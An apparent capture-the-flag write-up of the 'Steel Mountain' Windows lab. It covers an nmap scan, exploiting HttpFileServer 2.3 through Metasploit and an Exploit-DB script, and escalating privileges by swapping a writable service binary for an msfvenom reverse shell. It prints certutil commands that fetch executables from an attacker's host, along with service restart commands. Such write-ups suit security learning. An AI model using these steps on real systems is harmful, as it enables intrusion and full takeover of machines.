Steel Mountain
- running a scan to know what is going on on our targets network
Scan results
┌──(kali㉿kali)-[~]
└─$ nmap -A 10.10.70.217
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-30 02:09 EST
Nmap scan report for 10.10.70.217
Host is up (0.32s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2024-01-30T07:13:28+00:00; +1m50s from scanner time.
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2024-01-29T06:47:42
|_Not valid after: 2024-07-30T06:47:42
| rdp-ntlm-info:
| Target_Name: STEELMOUNTAIN
| NetBIOS_Domain_Name: STEELMOUNTAIN
| NetBIOS_Computer_Name: STEELMOUNTAIN
| DNS_Domain_Name: steelmountain
| DNS_Computer_Name: steelmountain
| Product_Version: 6.3.9600
|_ System_Time: 2024-01-30T07:13:21+00:00
8080/tcp open http HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:4c:5d:c0:bf:49 (unknown)
| smb2-time:
| date: 2024-01-30T07:13:22
|_ start_date: 2024-01-30T06:47:34
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
|_clock-skew: mean: 1m49s, deviation: 0s, median: 1m49s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.59 seconds
- From the above result i see that is is a windows OS.
- it has a web-server running on both port
80
an8080
navigating to the web-server on port 80
i found a picture of the employee of the month and nothing else
But when i view the page source i see where the web-server is serving that image from there backend server and the image is saved with a human name so it has to be employee of the month
- Nothing else to see from here so i navigate to the second web-server
8080
Initial access
- i was able to see the service version of the web-server from the bottom of the web-page
i then search for the version of the sever and i found the full name of the file server running and a possible exploit
clicking on the first link i was able to understand what i can use to get access
From some of the other search results i noticed some website said there is an exploit for this vulnerability on metasploit, so i start up metasploit and search using the
CVE
Then i set the needed options and run the module to get a Meterpreter shell
checking information about the target system i have :
C:\Users\bill\Desktop
Privilege Escalation
To enumerate this machine, i will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities
- “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.”
You can download the script here.  If you want to download it via the command line, be careful not to download the GitHub page instead of the raw script. Now you can use the upload command in Metasploit to upload the script.
To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell
[!note] The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!
Using msfvenom to generate a reverse shell as an Windows executable and naming it the exact name of the AdvancedSystemCareService9
executable file: Advanced.exe
and using the encoder x86/shikata_ga_nai
Then i uploaded the executable file into the Iobit
Directory on Bill's
machine
i type shell
in the meterpreter prompt to get a windows shell and copy the Advanced.exe
file into the Advanced SystemCare
directory
in a new terminal i started a netcat listener on the port specified in the msfvenom payload i created earlier.
Then i stop and restart the AdvancedSystemCareService9
service and i got an NTauthority\system
reverse shell to the listener
Manual Foothold and exploitation
For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to.
To begin we shall be using the same CVE the exploit code from exploitdb
here
To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!
You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!.
- before i begin i restart the machine so all changes will reset back to default
after downloading the exploit i used nano to change some needed settings
then i change the name of the Netcat binary i downloaded from
ncat.exe
tonc.exe
because from the exploit code i see that it is callingnc.exe
notncat.exe
┌──(kali㉿kali)-[~/Downloads] └─$ mv ncat.exe nc.exe
- i started a python server in the directory i have the
nc.exe
binary and also start a listener withe the port specified in the exploit the i run the exploit - i run the exploit again and this time i get a reverse shell connection
- i started a python server in the directory i have the
Privilege Escalation
I downloaded the WinpeasX64exe file from there official Github
I started another python web server in the directory i downnloaded it too and i created a directory on the target machine then use certutil
to transfer the winPEAS binary to the target machine
certutil -urlcache -f http://10.6.92.85:80/winPEASx64.exe winPEASx64.exe
then i run the the winPEAS script:
scrolling through the output i see this section about the unquoted path we used earlier
running powershell -c get-service
, i can see that the service is running sc stop AdvancedSystemCareService9
:
Then i moved into the Iobit directory and use certutil
to download the advance.exe file i created earlier with msfvenom to the target machine (my python server is still running)
certutil -urlcache -f http://10.6.92.85:80/Advanced.exe Advanced.exe
i copied the advanced.exe file to the Advanced SystemCare
directory then i stop and restart the service sc stop AdvancedSystemCareService9
then sc start AdvancedSystemCareService9
- lastly i use netcat to listen on the port that is specified in my msfvenom payload and i got a higher privilege shell